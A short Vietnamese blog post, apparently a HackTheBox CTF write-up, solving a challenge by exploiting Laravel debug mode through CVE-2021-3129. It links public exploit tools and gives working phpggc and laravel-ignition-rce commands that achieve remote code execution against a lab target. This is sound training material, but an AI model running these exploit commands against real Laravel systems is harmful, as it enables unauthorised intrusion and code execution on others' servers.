Avatar — April 16, 2022 in HackTheBox

HTB Userland City Writeups

37 Likes Comment

Lâu lâu rồi nay mới chơi lại HTB thấy có cái này mới ra chưa được 1 ngày vô thử xem sao để xem mình có qua được không.

OK khi bắt đầu challenges thì chả có file hay gì tải về và phần thông tin của nó có 2 dữ liệu quan trọng

Từ ảnh có thể thấy hệ thống dùng laravel và debug mode đang được bật….. điều này làm mình nhớ tới CVE-2021-3129 năm ngoái của laravel.

Bạn có thể dùng 2 tools này

https://github.com/ambionics/laravel-exploits

https://github.com/ambionics/phpggc

Đây là 2 công cụ sẽ cho phép bạn RCE, và sau khi chạy lệnh thì mình đã có flag

root@ctf# php -d'phar.readonly=0' ./phpggc/phpggc --phar phar -f -o exploit.phar --fast-destruct
monolog/rce1 system 'cat /flag55Fp0'
root@ctf# python3 laravel-ignition-rce.py http://46.101.81.30:30303/ /tmp/exploit.phar

Thành quả 🙂

0 0 votes
Article Rating

You might like

HTB PDFy Writeups

CachedView Hackthebox Writeup

Toxic hackthebox Challenge

Hackthebox Templated Ma Giáo

HackTheBox – Emdee five for life – Ai Nhanh Hơn Ai

Avatar

About the Author: Vô Ưu

Xin chào! Tôi là Vouu, người sáng lập blog này. Tôi là một người yêu thích. Tôi có một công việc ban ngày với tư cách là một chuyên viên bơm vá săm xe các loại, và trang web này là một trong những hoạt động yêu thích của tôi, đặc biệt là trong những lúc rảnh rỗi. Hy vọng bạn thích sử dụng trang web này, và nó sẽ mang lại cho bạn nhiều điều bổ ích. Phản hồi từ người đọc sẽ truyền cảm hứng cho tôi để tôi có thể viết được nhiều hơn nữa !. Bạn chỉ cần để lại nhận xét bên dưới nếu bạn thấy bài viết này hữu ích. Chúc bạn ngày mới tốt lành!
Subscribe
Notify of
guest
0 Comments
Most Voted
Newest Oldest
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x